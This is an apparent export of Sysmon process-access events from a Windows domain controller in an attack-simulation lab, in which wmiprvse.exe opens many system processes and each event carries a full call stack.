15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.408{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 